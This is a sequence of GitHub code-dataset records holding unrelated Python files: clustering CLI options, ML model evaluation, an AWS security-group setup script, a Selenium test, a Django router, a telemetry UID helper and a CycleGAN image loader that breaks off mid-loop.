first row of data file is a header\", action=\"store_true\")\n parser.add_argument(\"-mh\", \"--metadata_header\", default=False, help=\"whether the first row of metadata file is a header\", action=\"store_true\")\n parser.add_argument(\"-c\", \"--compress\", type=int, default=0, help=\"compress the data to contain maximum of specified count of rows\")\n parser.add_argument(\"-cv\", \"--compressed_value\", type=str, default=\"median\", help=\"the resulted value from merged rows when the data are compressed (median/mean/frequency)\")\n parser.add_argument(\"-mcv\", \"--metadata_compressed_value\", type=str, default=\"median\", help=\"the resulted value from merged rows of metadata when the data are compressed (median/mean/frequency)\")\n parser.add_argument(\"-dwd\", \"--dont_write_data\", default=False, help=\"don't write clustered data to the inchlib data format\", action=\"store_true\")\n parser.add_argument(\"-n\", \"--normalize\", default=False, help=\"normalize data to [0, 1] range\", action=\"store_true\")\n parser.add_argument(\"-wo\", \"--write_original\", default=False, help=\"cluster normalized data but write the original ones to the heatmap\", action=\"store_true\")\n parser.add_argument(\"-cm\", \"--column_metadata\", type=str, default=None, help=\"csv(text) metadata file with delimited values without header\")\n parser.add_argument(\"-cmd\", \"--column_metadata_delimiter\", type=str, default=\",\", help=\"delimiter of values in column metadata file\")\n parser.add_argument(\"-cmh\", \"--column_metadata_header\", default=False, help=\"whether the first column of the column metadata is the row label ('header')\", action=\"store_true\")\n parser.add_argument(\"-mv\", \"--missing_values\", type=str, nargs=\"+\", default=False, help=\"define the string representating missing values in the data\")\n parser.add_argument(\"-ad\", \"--alternative_data\", type=str, default=None, help=\"csv(text) alternative data file with delimited values\")\n parser.add_argument(\"-adh\", \"--alternative_data_header\", default=False, help=\"whether the first row of alternative data file is a header\", action=\"store_true\")\n parser.add_argument(\"-add\", \"--alternative_data_delimiter\", type=str, default=\",\", help=\"delimiter of values in alternative data file\")\n parser.add_argument(\"-adcv\", \"--alternative_data_compressed_value\", type=str, default=\"median\", help=\"the resulted value from merged rows of alternative data when the data are compressed (median/mean/frequency)\")\n parser.add_argument(\"-min\", \"--minify\", default=False, help=\"minify the InCHlib format\", action=\"store_true\")\n parser.add_argument(\"-dump\", \"--json_dump\", default=True, help=\"dump the InCHlib format as JSON\", action=\"store_true\")\n parser.add_argument(\"-cc\", \"--color_clusters\", type=int, default=0, help=\"color defined number of clusters\")\n parser.add_argument(\"-csf\", \"--compound_structure_field\", type=str, default=False, help=\"the name of a column with a compound structure\")\n parser.add_argument(\"-as\", \"--add_structures\", default=False, help=\"add structure smiles to the output json format\", action=\"store_true\")\n parser.add_argument(\"-cbs\", \"--cluster_by_structures\", default=False, help=\"cluster by compound structures (fingerprints)\", action=\"store_true\")\n parser.add_argument(\"-lf\", \"--label_field\", type=str, default=False, help=\"set a label field name in case it is in the data file\")\n \n args = parser.parse_args()\n 
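# --- Illustrative sketch (editor's addition, not part of the original record). ---
# The same pipeline can be driven programmatically instead of through argparse.
# This uses only the Cluster/Dendrogram API defined above; the CSV file name
# is a hypothetical placeholder.
def build_heatmap_json(csv_path="data.csv"):
    """Cluster a headered numeric CSV and return the InCHlib JSON string."""
    c = Cluster()
    c.read_csv(filename=csv_path, delimiter=",", header=True)
    c.normalize_data(feature_range=(0, 1), write_original=True)
    c.cluster_data(row_distance="euclidean", row_linkage="ward", axis="row")
    d = Dendrogram(c)
    d.create_cluster_heatmap(compress=0, compressed_value="median", write_data=True)
    return d.export_cluster_heatmap_as_json(filename=None, dump=True)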
_process_(args)\n\n","repo_name":"skutac/InCHlib.js","sub_path":"inchlib_clust/inchlib_clust_dev.py","file_name":"inchlib_clust_dev.py","file_ext":"py","file_size_in_byte":39173,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"77"} +{"seq_id":"44021599221","text":"#!/usr/bin/env python3\n\n\t#####################################################\n\t## WISCONSIN BREAST CANCER MACHINE LEARNING ##\n\t#####################################################\n\n# Project by Raul Eulogio\n\n# Project found at: https://www.inertia7.com/projects/3\n\n\n\"\"\"\nModel Evaluation\n\"\"\"\n# Import Packages -----------------------------------------------\nimport matplotlib.pyplot as plt\nfrom knn import fit_knn\nfrom random_forest import fit_rf\nfrom neural_networks import fit_nn\nfrom data_extraction import training_set, class_set\nfrom data_extraction import test_set, test_class_set\nfrom data_extraction import training_set_scaled, test_set_scaled\nfrom helper_functions import cross_val_metrics\nfrom produce_model_metrics import produce_model_metrics\nfrom terminaltables import AsciiTable\nfrom sklearn.metrics import classification_report\n\n\n\n# Calling up metrics from the model scripts\n# KNN -----------------------------------------------------------\nmetrics_knn = produce_model_metrics(fit_knn, test_set,\n\ttest_class_set, 'knn')\n# Call each value from dictionary\npredictions_knn = metrics_knn['predictions']\naccuracy_knn = metrics_knn['accuracy']\nfpr = metrics_knn['fpr']\ntpr = metrics_knn['tpr']\nauc_knn = metrics_knn['auc']\n\n# Test Error Rate\ntest_error_rate_knn = 1 - accuracy_knn\n\n# Cross Validated Score\nmean_cv_knn, std_error_knn = cross_val_metrics(fit_knn,\n training_set,\n class_set,\n 'knn',\n print_results = False)\n\n# RF ------------------------------------------------------------\nmetrics_rf = produce_model_metrics(fit_rf, test_set,\n\ttest_class_set, 'rf')\n# Call each value from dictionary\npredictions_rf = metrics_rf['predictions']\naccuracy_rf = metrics_rf['accuracy']\nfpr2 = metrics_rf['fpr']\ntpr2 = metrics_rf['tpr']\nauc_rf = metrics_rf['auc']\n\n# Test Error Rate\ntest_error_rate_rf = 1 - accuracy_rf\n\n# Cross Validated Score\nmean_cv_rf, std_error_rf = cross_val_metrics(fit_rf,\n training_set,\n class_set,\n 'rf',\n print_results = False)\n\n# NN ------------------------------------------------------------\nmetrics_nn = produce_model_metrics(fit_nn, test_set_scaled,\n\ttest_class_set, 'nn')\n\n# Call each value from dictionary\npredictions_nn = metrics_nn['predictions']\naccuracy_nn = metrics_nn['accuracy']\nfpr3 = metrics_nn['fpr']\ntpr3 = metrics_nn['tpr']\nauc_nn = metrics_nn['auc']\n\n# Test Error Rate\ntest_error_rate_nn = 1 - accuracy_nn\n\n# Cross Validated Score\nmean_cv_nn, std_error_nn = cross_val_metrics(fit_nn,\n training_set_scaled,\n class_set,\n 'nn',\n print_results = False)\n\n# Main ----------------------------------------------------------\nif __name__ == '__main__':\n\t# Populate list for human readable table from terminal line\n\ttable_data = [[ 'Model/Algorithm', 'Test Error Rate',\n 'False Negative for Test Set', 'Area under the Curve for ROC',\n 'Cross Validation Score'],\n ['Kth Nearest Neighbor',\n round(test_error_rate_knn, 3),\n 5,\n round(auc_knn, 3),\n \"Accuracy: {0: 0.3f} (+/- {1: 0.3f})\"\\\n .format(mean_cv_knn, std_error_knn)],\n [ 'Random Forest',\n round(test_error_rate_rf, 3),\n 3,\n round(auc_rf, 3),\n \"Accuracy: {0: 0.3f} (+/- {1: 0.3f})\"\\\n\t\t\t\t.format(mean_cv_rf, 
std_error_rf)],\n [ 'Neural Networks' ,\n round(test_error_rate_nn, 3),\n 1,\n round(auc_nn, 3),\n \"Accuracy: {0: 0.3f} (+/- {1: 0.3f})\"\\\n\t\t\t\t.format(mean_cv_nn, std_error_nn)]]\n\n\t# convert to AsciiTable from terminaltables package\n\ttable = AsciiTable(table_data)\n\n\ttarget_names = ['Benign', 'Malignant']\n\n\tprint('Classification Report for Kth Nearest Neighbor:')\n\tprint(classification_report(predictions_knn,\n\t\ttest_class_set,\n\t\ttarget_names = target_names))\n\n\tprint('Classification Report for Random Forest:')\n\tprint(classification_report(predictions_rf,\n\t\ttest_class_set,\n\t\ttarget_names = target_names))\n\n\tprint('Classification Report for Neural Networks:')\n\tprint(classification_report(predictions_nn,\n\t\ttest_class_set,\n\t\ttarget_names = target_names))\n\n\tprint(\"Comparison of different logistics relating to model evaluation:\")\n\tprint(table.table)\n\n\t# Plotting ROC Curves----------------------------------------\n\tf, ax = plt.subplots(figsize=(10, 10))\n\n\tplt.plot(fpr, tpr, label='Kth Nearest Neighbor ROC Curve (area = {0: .3f})'\\\n\t\t.format(auc_knn),\n \tcolor = 'deeppink',\n \tlinewidth=1)\n\tplt.plot(fpr2, tpr2,label='Random Forest ROC Curve (area = {0: .3f})'\\\n\t\t.format(auc_rf),\n \tcolor = 'red',\n \tlinestyle=':',\n \tlinewidth=2)\n\tplt.plot(fpr3, tpr3,label='Neural Networks ROC Curve (area = {0: .3f})'\\\n\t\t.format(auc_nn),\n \tcolor = 'purple',\n \tlinestyle=':',\n \tlinewidth=3)\n\n\tax.set_axis_bgcolor('#fafafa')\n\tplt.plot([0, 1], [0, 1], 'k--', lw=2)\n\tplt.plot([0, 0], [1, 0], 'k--', lw=2, color = 'black')\n\tplt.plot([1, 0], [1, 1], 'k--', lw=2, color = 'black')\n\tplt.xlim([-0.01, 1.0])\n\tplt.ylim([0.0, 1.05])\n\tplt.xlabel('False Positive Rate')\n\tplt.ylabel('True Positive Rate')\n\tplt.title('ROC Curve Comparison For All Models')\n\tplt.legend(loc=\"lower right\")\n\tplt.show()\n\n\t# Zoomed in\n\tf, ax = plt.subplots(figsize=(10, 10))\n\tplt.plot(fpr, tpr, label='Kth Nearest Neighbor ROC Curve (area = {0: .3f})'\\\n\t\t.format(auc_knn),\n \tcolor = 'deeppink',\n \tlinewidth=1)\n\tplt.plot(fpr2, tpr2,label='Random Forest ROC Curve (area = {0: .3f})'\\\n\t\t.format(auc_rf),\n \tcolor = 'red',\n \tlinestyle=':',\n \tlinewidth=3)\n\tplt.plot(fpr3, tpr3,label='Neural Networks ROC Curve (area = {0: .3f})'\\\n\t\t.format(auc_nn),\n \tcolor = 'purple',\n \tlinestyle=':',\n \tlinewidth=3)\n\n\tax.set_axis_bgcolor('#fafafa')\n\tplt.plot([0, 1], [0, 1], 'k--', lw=2) # Add Diagonal line\n\tplt.plot([0, 0], [1, 0], 'k--', lw=2, color = 'black')\n\tplt.plot([1, 0], [1, 1], 'k--', lw=2, color = 'black')\n\tplt.xlim([-0.001, 0.2])\n\tplt.ylim([0.7, 1.05])\n\tplt.xlabel('False Positive Rate')\n\tplt.ylabel('True Positive Rate')\n\tplt.title('ROC Curve Comparison For All Models (Zoomed)')\n\tplt.legend(loc=\"lower right\")\n\tplt.show()\n\n\tprint('fin \\n:)')\n","repo_name":"raviolli77/machineLearning_breastCancer_Python","sub_path":"src/python/model_eval.py","file_name":"model_eval.py","file_ext":"py","file_size_in_byte":6721,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"77"} +{"seq_id":"6443453188","text":"from Utils.CustomLogging import CLogger\nfrom Utils.CustomExceptions import CExcept\nfrom datetime import datetime\n\n\nclass Opportunities:\n __blogs = list()\n __affiliates = list()\n\n def create_blog(self, p_title: str, p_subheading: str, p_content: str, p_created_by: str):\n title, subheading, content, created_by =\\\n self.__validate_blog_creation(p_title, 
p_subheading, p_content, p_created_by)\n self.__blogs.append({\n \"blog_id\": len(self.__blogs) + 1,\n \"title\": title,\n \"subheading\": subheading,\n \"content\": content,\n \"created_by\": created_by,\n \"created_at\": datetime.now(),\n \"claps\": 0\n })\n return \"Blog created successfully\"\n\n def show_blogs(self, blog_id=-1):\n filtered_blogs = []\n if blog_id > 0:\n filtered_blogs = list(filter(lambda b: b.blog_id == blog_id, self.__blogs))\n else:\n filtered_blogs = self.__blogs\n return len(filtered_blogs), filtered_blogs\n\n def become_an_affiliate(self, p_affiliate_name: str, p_promoted_social_networks: list, p_min_num_of_proms_per_week: int, p_social_status: int):\n affiliate_name, promoted_social_networks, min_num_of_proms_per_week, \\\n social_status, desc_social_status, min_earn = \\\n self.__validate_affiliates(p_affiliate_name, p_promoted_social_networks, p_min_num_of_proms_per_week, p_social_status)\n self.__affiliates.append({\n \"affiliate_id\": len(self.__affiliates) + 1,\n \"affiliate_name\": affiliate_name,\n \"promoted_social_networks\": promoted_social_networks,\n \"min_num_of_proms_per_week\": min_num_of_proms_per_week,\n \"id_social_status\": social_status,\n \"description_social_status\": desc_social_status,\n \"min_earn\": min_earn\n })\n return \"Congratulations on your role\"\n\n def get_affiliates(self, affiliate_id=-1):\n filtered_affiliates = []\n if affiliate_id > 0:\n filtered_affiliates = list(filter(lambda b: b.blog_id == affiliate_id, self.__affiliates))\n else:\n filtered_affiliates = self.__affiliates\n return len(filtered_affiliates), filtered_affiliates\n\n @staticmethod\n def __validate_blog_creation(title: str, subheading: str, content: str, created_by: str):\n if title.strip() == \"\":\n CExcept(\"Title cannot be blank.\")\n elif content.strip() == \"\":\n CExcept(\"Content cannot be blank.\")\n elif created_by.strip() == \"\":\n CExcept(\"Created by cannot be blank\")\n\n ret_title = title\n if len(title) > 100:\n ret_title = title[0:100]\n CLogger(\"Title should be less than or equal to 100 characters length\")\n\n ret_subheading = subheading\n if len(subheading) > 150:\n ret_subheading = subheading[0:150]\n CLogger(\"Subheading should be less than or equal to 150 characters length\")\n\n return ret_title, ret_subheading, content, created_by\n\n @staticmethod\n def __validate_affiliates(p_affiliate_name: str, p_promoted_social_networks: list, p_min_num_of_proms_per_week: int, p_social_status: str):\n if p_affiliate_name.strip() == \"\":\n CExcept(\"Affiliate cannot be anonymous\")\n elif len(p_promoted_social_networks) == 0:\n CExcept(\"Minimum on one social network to be posted\")\n affiliate_name = p_affiliate_name\n promoted_social_networks = p_promoted_social_networks\n min_num_of_proms_per_week = p_min_num_of_proms_per_week\n social_status = p_social_status\n desc_social_status = \"\"\n min_earn_per_month = 25000\n\n if p_min_num_of_proms_per_week <= 0:\n CLogger(\"Minimum on one promotion per week is needed\")\n\n if p_social_status == 0:\n min_earn_per_month = min_earn_per_month * 10\n desc_social_status = \"International Actor/Sports/Business person\"\n elif p_social_status == 1:\n min_earn_per_month = min_earn_per_month * 6\n desc_social_status = \"National Public Figure/Actor\"\n elif p_social_status == 2:\n min_earn_per_month = min_earn_per_month * 4\n desc_social_status = \"Dedicated working professional\"\n elif p_social_status == 3:\n min_earn_per_month = min_earn_per_month * 2\n desc_social_status = \"Part-time working 
professional\"\n else:\n desc_social_status = \"Unknown\"\n CLogger(f\"Please maintain the status to get better earn\")\n\n return affiliate_name, promoted_social_networks, min_num_of_proms_per_week, social_status, desc_social_status, min_earn_per_month\n\n\n# o = Opportunities()\n# t_c, b = o.show_blogs()\n# print(f\"Total number of blogs are {t_c}, blogs: {b}.\")\n# my_blog = {\n# \"p_title\": \"This is my first blog\",\n# \"p_subheading\": \"This blog is about how to write blog\",\n# \"p_content\": \"\"\"\n# There are no rules or standards to write a blog.\n# Blog should be sensible and useful to recognition, that's all.\n# Chrees.\n# \"\"\",\n# \"p_created_by\": \"subramanyam.sista@gmail.com\"\n# }\n# o.create_blog(**my_blog)\n# print(f\"Total number of blogs are {t_c}, blogs: {b}.\")\n#\n# myaffiliation = {\n# \"p_affiliate_name\": \"Zubuza\",\n# \"p_promoted_social_networks\": [\"manga\"],\n# \"p_min_num_of_proms_per_week\": 1,\n# \"p_social_status\": 0\n# }\n# status = o.become_an_affiliate(**myaffiliation)\n# if status == \"success\":\n# print(f\"Congratulations!!\")\n# print(o.get_affiliates())\n","repo_name":"SAI-SRINIVASA-SUBRAMANYAM/INeuronClasses","sub_path":"INeuronPracticeSessions/Tasks/Jul2022/Jul07Task/Task9.py","file_name":"Task9.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37751155307","text":"import boto3\nfrom botocore.exceptions import ClientError\nimport sys\n\n### User definedvars\nregion = 'us-east-2'\ngroup_name = 'LINUX-SG'\nenv_name = 'USE2-SB-LAB1'\n\nIpPermissions=[{'IpProtocol': 'tcp',\n 'FromPort': 22,\n 'ToPort': 22,\n 'IpRanges': [{\n 'CidrIp': '24.63.0.0/16', \n 'Description': 'Lab CIDR'}]},\n ]\n\n\n#aws_access_key = sys.argv[1]\n#aws_secret_key = sys.argv[2]\ndescription = '{0} {1}'.format(env_name, 'linux instance security group')\n\nec2 = boto3.resource('ec2',\n #aws_access_key_id = aws_access_key ,\n #aws_secret_access_key = aws_secret_key ,\n region_name = region,\n)\n\nclient = boto3.client('ec2',\n #aws_access_key_id = aws_access_key ,\n #aws_secret_access_key = aws_secret_key ,\n region_name = region,\n)\n\n\nvpc_name = '{0}{1}'.format(env_name, '-VPC')\nvpc_id = []\n\nresponse = client.describe_vpcs()\n\ncount0 = len(response['Vpcs'])\n\nresponse['Vpcs'][1]['Tags'][0]['Key']\n\nfor x in range(0,count0):\n count1 = len(response['Vpcs'][x]['Tags'])\n #print(count1)\n for y in range(0,count1):\n if response['Vpcs'][x]['Tags'][y]['Key'] == 'Name' and response['Vpcs'][x]['Tags'][y]['Value'] == vpc_name:\n vpc_id.append(response['Vpcs'][x]['VpcId'])\n else:\n continue\n\nvpc = ec2.Vpc(vpc_id[0])\n\n###########################################################################\n####### Uncomment if you are creating a new security-group ################\n###########################################################################\n\"\"\"\nsecurity_group = vpc.create_security_group(\n Description=description,\n GroupName=group_name,\n DryRun=False,\n)\n\nsg = str(security_group)\nsg_id = sg[22:42]\n\"\"\"\n##########################################################################\n##########################################################################\n##########################################################################\n\nsg_name = '{0}{1}'.format(env_name, group_name)\n\nsg_id = []\n\nresponse = client.describe_security_groups()\n\ncount3 = len(response['SecurityGroups'])\n\nfor x in range(0,count3):\n count4 = 
len(response['SecurityGroups'])\n for y in range(0,count4):\n if response['SecurityGroups'][y]['VpcId'] == vpc_id[0] and response['SecurityGroups'][y]['GroupName'] == group_name:\n sg_id.append(response['SecurityGroups'][y]['GroupId'])\n else:\n continue \n#print(sg_id[0])\n\nsecurity_group = ec2.SecurityGroup(sg_id[0])\n\n##########################################################################\n################# comment out if creating new security-group #############\n##########################################################################\n\n# First, we remove all existing rules in the group:\nsecurity_group.revoke_ingress(IpPermissions=security_group.ip_permissions)\n\n\n##########################################################################\n########################### Security group rules #########################\n##########################################################################\n\nsg_rule={'IpProtocol': '-1',\n 'FromPort': -1,\n 'ToPort': -1,\n 'UserIdGroupPairs': [{\n 'GroupId': sg_id[0]}]} #This will permit hosts, in this security group to talk to themselves\n\nIpPermissions.append(sg_rule)\n\n#Second, we re-apply the rules\ndata = security_group.authorize_ingress(\n IpPermissions=IpPermissions)\n\n\nvalue = '{0}{1}{2}'.format(env_name, '-', group_name)\n\ntag = security_group.create_tags(\n DryRun=False,\n Tags=[\n {\n 'Key': 'Name',\n 'Value': value\n },\n ]\n)\n\n","repo_name":"SyrusHCW/ansible-juniper","sub_path":"LINUX-SG.py","file_name":"LINUX-SG.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29502759956","text":"# Coding Interview Question\n# Backtracking Approach\n# Author: Pavan Kumar Paluri\n\ndef count_options(num_persons:int, num_groups:int)->list:\n\tlist_grp= []\n\tfinal_list= []\n\tdef helper(num_groups, list_grp, start, summ):\n\t\t# using backtracking\n\t\t# Stopping conditions..\n\t\tif summ <0 or len(list_grp)>num_groups:\n\t\t\treturn \n\t\tif summ==0 and len(list_grp)==num_groups:\n\t\t\tlist_grp = sorted(list_grp[:])\n\t\t\tif list_grp not in final_list:\n\t\t\t\tfinal_list.append(sorted(list_grp[:]))\n\t\tfor i in range(1,num_persons):\n\t\t\tlist_grp.append(i)\n\t\t\thelper(num_groups, list_grp, start, summ-i)\n\t\t\tlist_grp.pop()\n\n\tsumm = num_persons\n\thelper(num_groups, [], 0,summ)\n\treturn (final_list)\n\n\nif __name__==\"__main__\":\n\tnum_persons = int(input(\"Enter the number of persons: \"))\n\tnum_groups = int(input(\"Enter the number of groups: \"))\n\tprint(count_options(num_persons, num_groups))\n","repo_name":"pvpk1994/Leetcode_Medium","sub_path":"Python/Backtracking/grouping_options.py","file_name":"grouping_options.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9415343601","text":"import os\nfrom platform import system\n\nimport telemetry.utils.isip as isip\n\n\ndef save_uid_to_file(file_name: str, uid: str):\n \"\"\"\n Save the uid to the specified file\n \"\"\"\n try:\n # create directories recursively first\n os.makedirs(os.path.dirname(file_name), exist_ok=True)\n\n with open(file_name, 'w') as file:\n file.write(uid)\n except Exception as e:\n print('Failed to generate the UID file: {}'.format(str(e)))\n return False\n return True\n\n\ndef get_or_generate_uid(file_name: str, generator: callable, validator: [callable, None]):\n \"\"\"\n Get existing UID or generate a new one.\n :param file_name: name of 
the file with the UID\n :param generator: the function to generate the UID\n :param validator: the function to validate the UID\n :return: the existing or a newly generated UID\n \"\"\"\n full_path = os.path.join(get_uid_path(), file_name)\n uid = None\n if os.path.exists(full_path):\n with open(full_path, 'r') as file:\n uid = file.readline().strip()\n\n if uid is not None and (validator is not None and not validator(uid)):\n uid = None\n\n if uid is None:\n uid = generator()\n save_uid_to_file(full_path, uid)\n return uid\n\n\ndef get_uid_path():\n \"\"\"\n Returns the directory with the OpenVINO randomly generated UUID file.\n\n :return: the directory with the UUID file\n \"\"\"\n platform = system()\n subdir = None\n if platform == 'Windows':\n subdir = 'Intel Corporation'\n elif platform in ['Linux', 'Darwin']:\n subdir = '.intel'\n if subdir is None:\n raise Exception('Failed to determine the operating system type')\n\n return os.path.join(isip.isip_consent_base_dir(), subdir)\n","repo_name":"zhaohb/myopenvino","sub_path":"model-optimizer/telemetry/utils/guid.py","file_name":"guid.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}{"seq_id":"1183064087","text":"from traits.api import Instance\n\nfrom force_bdss.api import (\n BaseNotificationListener,\n)\n\nfrom force_gromacs.notification_listeners.driver_events import (\n SimulationProgressEvent\n)\n\nfrom .hpc_writer_model import HPCWriterModel\n\n\nclass HPCWriter(BaseNotificationListener):\n \"\"\"Class that outputs a bash script that can be submitted to an\n HPC queue in order to run a Gromacs simulation on a remote cluster\"\"\"\n\n #: A reference to the HPCWriterModel object created during the\n #: force-bdss MCODriver loop. 
Used to pass messages to the MCO.\n model = Instance(HPCWriterModel)\n\n # --------------------\n # Private Methods\n # --------------------\n\n def _write_hpc_script(self, file_path, hpc_script):\n \"\"\"Writes the HPC script to a bash file located at\n `file_path`\"\"\"\n\n if not self.model.dry_run:\n with open(file_path, 'w') as outfile:\n outfile.write(hpc_script)\n\n def _extract_simulation_name(self, bash_script):\n \"\"\"If bash_script contains a simulation name, extract and\n return it; otherwise create a unique id\"\"\"\n\n lines = bash_script.split('\\n')\n\n for line in lines:\n if line.isspace():\n continue\n\n if line.startswith('#'):\n name = line.strip('# ')\n return name\n else:\n break\n\n name = f\"gromacs-sim-{id(bash_script)}\"\n\n return name\n\n # --------------------\n # Public Methods\n # --------------------\n\n def create_file_path(self, simulation_name):\n \"\"\"Create a unique file path to write the bash script to\"\"\"\n\n file_path = '_'.join([self.model.prefix, simulation_name]) + '.sh'\n\n return file_path\n\n def create_hpc_script(self, bash_script):\n \"\"\"Combines the user-supplied header for the HPC cluster with the Gromacs\n script\"\"\"\n\n hpc_script = \"#!/bin/sh\\n\"\n hpc_script += self.model.header\n hpc_script += f\"\\n\\n{bash_script}\"\n\n return hpc_script\n\n def initialize(self, model):\n self.model = model\n\n def deliver(self, event):\n\n if isinstance(event, SimulationProgressEvent):\n\n bash_script = event.bash_script\n\n simulation_name = self._extract_simulation_name(bash_script)\n file_path = self.create_file_path(simulation_name)\n hpc_script = self.create_hpc_script(bash_script)\n\n self._write_hpc_script(file_path, hpc_script)\n\n return hpc_script\n","repo_name":"force-h2020/force-bdss-plugin-gromacs","sub_path":"force_gromacs/notification_listeners/hpc_writer/hpc_writer.py","file_name":"hpc_writer.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}{"seq_id":"21063245354","text":"import csv\nimport unittest\nfrom time import sleep\nfrom automate_driver.automate_driver import AutomateDriver\nfrom model.connect_sql import ConnectSql\nfrom pages.base.base_page import BasePage\nfrom pages.login.log_in_page_read_csv import LogInPageReadCsv\nfrom pages.login.login_page import LoginPage\nfrom pages.organize_management.organize_management import OrganizeManagement\nfrom pages.organize_management.organize_management_read_csv import OrganizeManagementReadCsv\nfrom pages.user_center.user_center import UserCenter\nfrom pages.user_center.user_center_read_csv import UserCenterReadCsv\n\n\n\nclass TestCase08OrgManageDeleteOrg(unittest.TestCase):\n # Test deleting a company department in department management\n def setUp(self):\n self.driver = AutomateDriver()\n self.base_url = self.driver.base_url\n self.base_page = BasePage(self.driver, self.base_url)\n self.login_page = LoginPage(self.driver, self.base_url)\n self.user_center = UserCenter(self.driver, self.base_url)\n self.organize_management = OrganizeManagement(self.driver, self.base_url)\n self.log_in_page_read_csv = LogInPageReadCsv()\n self.user_center_read_csv = UserCenterReadCsv()\n self.organize_management_read_csv = OrganizeManagementReadCsv()\n self.driver.set_window_max()\n self.connect_sql = ConnectSql()\n self.driver.wait(1)\n self.driver.clear_cookies()\n self.driver.wait(1)\n\n\n\n def tearDown(self):\n self.driver.quit_browser()\n\n def test_delete_org(self):\n # Test the delete-department feature using csv data\n\n\n # Open the risk-control home page (login page)\n self.base_page.open_page()\n sleep(1)\n # Log in to the account\n 
self.login_page.test_user_login()\n\n # Get the currently logged-in account\n log_in_account = self.user_center.get_login_account()\n print(log_in_account)\n\n # Click into department management\n self.organize_management.click_org_manage()\n\n csv_file = self.user_center_read_csv.read_csv('delete_org.csv')\n csv_data = csv.reader(csv_file)\n for row in csv_data:\n delete_org = {\n \"org_name\": row[0],\n }\n\n # Search for the department by name\n self.organize_management.search_org(delete_org['org_name'])\n\n # Click delete\n self.organize_management.click_delete_org()\n\n # Switch out of the frame\n self.organize_management.switch_to_default_content()\n # Cancel\n self.organize_management.delete_org_dismiss()\n\n # Switch into the frame\n self.organize_management.switch_to_1_frame()\n # Click delete\n self.organize_management.click_delete_org()\n # Switch out of the frame\n self.organize_management.switch_to_default_content()\n # Close\n self.organize_management.delete_org_close()\n\n # Switch into the frame\n self.organize_management.switch_to_1_frame()\n # Click delete\n self.organize_management.click_delete_org()\n # Switch out of the frame\n self.organize_management.switch_to_default_content()\n # Confirm\n self.organize_management.delete_org_accept()\n\n # Verify in the database that the department was deleted\n\n # Look up the department in the database\n org_name_after_delete = self.organize_management.get_search_result_orgname_by_sql(log_in_account, '')\n\n self.assertNotIn(delete_org['org_name'],org_name_after_delete)\n\n # Switch into the frame\n self.organize_management.switch_to_1_frame()\n\n\n csv_file.close()\n\n # Switch out of the frame\n self.organize_management.switch_to_default_content()\n # Log out\n self.user_center.logout()\n","repo_name":"huangqiming123/risk_control_automate_test","sub_path":"testcases/organize_management/test_case_08_org_manage_delete_org.py","file_name":"test_case_08_org_manage_delete_org.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}{"seq_id":"1958243966","text":"from rest_framework import routers\n\nfrom .views import CoursesViewSet, ThemeViewSet, TestViewSet, UserViewSet, GroupViewSet, QuestionViewSet\n\n# urlpatterns = [\n# url(r'^courses/$', views.course_list),\n# url(r'^courses/(?P[0-9]+)/$', views.course_detail),\n# ]\n#\n# urlpatterns = format_suffix_patterns(urlpatterns)\n\nrouter = routers.DefaultRouter()\nrouter.register(r'courses', CoursesViewSet)\nrouter.register(r'themes', ThemeViewSet)\nrouter.register(r'tests', TestViewSet)\nrouter.register(r'users', UserViewSet)\nrouter.register(r'groups', GroupViewSet)\nrouter.register(r'questions', QuestionViewSet)\n\n# urlpatterns = [\n# url(r'^/(?P[0-9a-zA-Z_-]+)$', UserDetail.as_view(), name='user-detail'),\n# ]\n\nurlpatterns = router.urls\n
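\n# For each registered ViewSet the DefaultRouter generates list and detail routes,\n# e.g. 'courses/' and 'courses/{pk}/' for CoursesViewSet.\n","repo_name":"KuzminKirill/Django-Rest-Api-for-Android-app","sub_path":"apitry/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}{"seq_id":"4813603637","text":"# https://youtu.be/VzIO5_R9XEM\r\n# https://youtu.be/2MSGnkir9ew\r\n\"\"\"\r\nCycle GAN: Monet2Photo\r\n\r\nDataset from https://people.eecs.berkeley.edu/~taesung_park/CycleGAN/datasets/\r\n\r\n\"\"\"\r\n\r\n# monet2photo\r\nfrom os import listdir\r\nfrom numpy import asarray\r\nfrom numpy import vstack\r\nfrom keras.preprocessing.image import img_to_array\r\nfrom keras.preprocessing.image import load_img\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\n# load all images in a directory into memory\r\ndef load_images(path, size=(256,256)):\r\n\tdata_list = list()\r\n\t# enumerate filenames in directory, assume all are images\r\n\tfor filename in 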
listdir(path):\r\n\t\t# load and resize the image\r\n\t\tpixels = load_img(path + filename, target_size=size)\r\n\t\t# convert to numpy array\r\n\t\tpixels = img_to_array(pixels)\r\n\t\t# store\r\n\t\tdata_list.append(pixels)\r\n\treturn asarray(data_list)\r\n\r\n\r\n# dataset path\r\npath = 'monet2photo/'\r\n\r\n# load dataset A - Monet paintings\r\ndataA_all = load_images(path + 'trainA/')\r\nprint('Loaded dataA: ', dataA_all.shape)\r\n\r\nfrom sklearn.utils import resample\r\n#To get a subset of all images, for faster training during demonstration\r\ndataA = resample(dataA_all, \r\n replace=False, \r\n n_samples=500, \r\n random_state=42) \r\n\r\n# load dataset B - Photos \r\ndataB_all = load_images(path + 'trainB/')\r\nprint('Loaded dataB: ', dataB_all.shape)\r\n#Get a subset of all images, for faster training during demonstration\r\n#We could have just read the list of files and only load a subset, better memory management. \r\ndataB = resample(dataB_all, \r\n replace=False, \r\n n_samples=500, \r\n random_state=42) \r\n\r\n# plot source images\r\nn_samples = 3\r\nfor i in 